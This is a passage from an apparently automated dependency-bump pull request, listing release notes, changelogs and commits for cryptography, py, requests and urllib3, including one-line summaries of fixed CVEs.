2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/43.0.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.32.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.32.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.19 to 2.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.5.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eSecurity issues\u003c/h1\u003e\n\u003cp\u003eurllib3 2.5.0 fixes two moderate security issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePool managers now properly control redirects when \u003ccode\u003eretries\u003c/code\u003e is passed — CVE-2025-50181 reported by \u003ca href=\"https://github.com/sandumjacob\"\u003e\u003ccode\u003e@​sandumjacob\u003c/code\u003e\u003c/a\u003e (5.3 Medium, GHSA-pq67-6m6q-mj2v)\u003c/li\u003e\n\u003cli\u003eRedirects are now controlled by urllib3 in the Node.js runtime — CVE-2025-50182 (5.3 Medium, GHSA-48p4-8xcf-vxj5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14. See \u003ca href=\"https://peps.python.org/pep-0784/\"\u003ePEP 784\u003c/a\u003e for more information. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3610\"\u003e#3610\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3612\"\u003e#3612\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3581\"\u003e#3581\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3522\"\u003e#3522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3567\"\u003e#3567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3571\"\u003e#3571\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3555\"\u003e#3555\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eMisc\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3550\"\u003e#3550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3566\"\u003e#3566\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.5.0 (2025-06-18)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14.\nSee \u003ccode\u003ePEP 784 \u0026lt;https://peps.python.org/pep-0784/\u0026gt;\u003c/code\u003e_ for more information. (\u003ccode\u003e[#3610](https://github.com/urllib3/urllib3/issues/3610) \u0026lt;https://github.com/urllib3/urllib3/issues/3610\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ccode\u003e[#3612](https://github.com/urllib3/urllib3/issues/3612) \u0026lt;https://github.com/urllib3/urllib3/issues/3612\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a security issue where restricting the maximum number of followed\nredirects at the \u003ccode\u003eurllib3.PoolManager\u003c/code\u003e level via the \u003ccode\u003eretries\u003c/code\u003e parameter\ndid not work.\u003c/li\u003e\n\u003cli\u003eMade the Node.js runtime respect redirect parameters such as \u003ccode\u003eretries\u003c/code\u003e\nand \u003ccode\u003eredirects\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ccode\u003e[#3581](https://github.com/urllib3/urllib3/issues/3581) \u0026lt;https://github.com/urllib3/urllib3/issues/3581\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ccode\u003e[#3615](https://github.com/urllib3/urllib3/issues/3615) \u0026lt;https://github.com/urllib3/urllib3/issues/3615\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.4.0 (2025-04-10)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ccode\u003e[#3522](https://github.com/urllib3/urllib3/issues/3522) \u0026lt;https://github.com/urllib3/urllib3/issues/3522\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ccode\u003e[#3567](https://github.com/urllib3/urllib3/issues/3567) \u0026lt;https://github.com/urllib3/urllib3/issues/3567\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ccode\u003e[#3571](https://github.com/urllib3/urllib3/issues/3571) \u0026lt;https://github.com/urllib3/urllib3/issues/3571\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ccode\u003e[#3555](https://github.com/urllib3/urllib3/issues/3555) \u0026lt;https://github.com/urllib3/urllib3/issues/3555\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ccode\u003e[#3550](https://github.com/urllib3/urllib3/issues/3550) \u0026lt;https://github.com/urllib3/urllib3/issues/3550\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ccode\u003e[#3566](https://github.com/urllib3/urllib3/issues/3566) \u0026lt;https://github.com/urllib3/urllib3/issues/3566\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.3.0 (2024-12-22)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/aaab4eccc10c965897540b21e15f11859d0b62e7\"\u003e\u003ccode\u003eaaab4ec\u003c/code\u003e\u003c/a\u003e Release 